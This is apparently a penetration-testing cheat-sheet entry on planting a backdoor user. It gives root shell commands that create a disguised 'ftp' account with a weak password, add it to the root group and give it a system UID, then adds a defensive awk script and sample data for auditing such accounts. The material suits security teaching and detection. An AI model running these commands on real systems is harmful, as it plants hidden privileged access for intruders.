Adding backdoor user

Persistence

  • Create a backdoor user with administrative privileges that can be used to access the target system via SSH

```shell
whoami
	root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
	password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
	ftp : ftp root
```

❗ Changing a user's password is a strong indicator of compromise; it should not be done.
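The account produced above has traits a defender can audit for: a system-range UID paired with an interactive login shell, and membership of the root group (GID 0). The script below is an added example, not part of the original page; the function names, the 1-999 system UID range, the shell list and the reason labels are assumptions, and the passwd/group data is constructed to mirror the state shown above.

```shell
#!/bin/sh
# Added defensive example; thresholds and reason labels are assumptions.
# Usage: audit_accounts PASSWD_FILE GROUP_FILE
# Prints "user:reason[,reason]" for every non-root account that matches.
audit_accounts() {
    awk -F: '
        # First argument is the group database: collect members of GID 0.
        FILENAME == ARGV[1] {
            if ($3 == 0) {
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") gid0[m[i]] = 1
            }
            next
        }
        # Second argument is the passwd database.
        $1 != "root" {
            r = ""
            # UID in the system range (1-999 assumed) plus an interactive shell.
            if ($3 > 0 && $3 < 1000 && $7 ~ /\/(ba|da|z|k|c|tc|fi)?sh$/)
                r = r ",system-uid-login-shell"
            # Primary or supplementary membership of the root group.
            if ($4 == 0 || ($1 in gid0)) r = r ",gid0-member"
            # Any additional account sharing UID 0.
            if ($3 == 0) r = r ",uid0-duplicate"
            if (r != "") print $1 ":" substr(r, 2)
        }
    ' "$2" "$1"
}

# Constructed sample data mirroring the account state shown above.
demo_audit() {
    d=$(mktemp -d) || return 1
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ftp:x:15:1001::/home/ftp:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
EOF
    cat > "$d/group" <<'EOF'
root:x:0:ftp
ftp:x:1001:
alice:x:1000:
EOF
    audit_accounts "$d/passwd" "$d/group"
    rm -rf "$d"
}

demo_audit
```

On a live host, run `audit_accounts /etc/passwd /etc/group` and compare the output against a known-good baseline, since some legitimate service accounts ship with a login shell.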
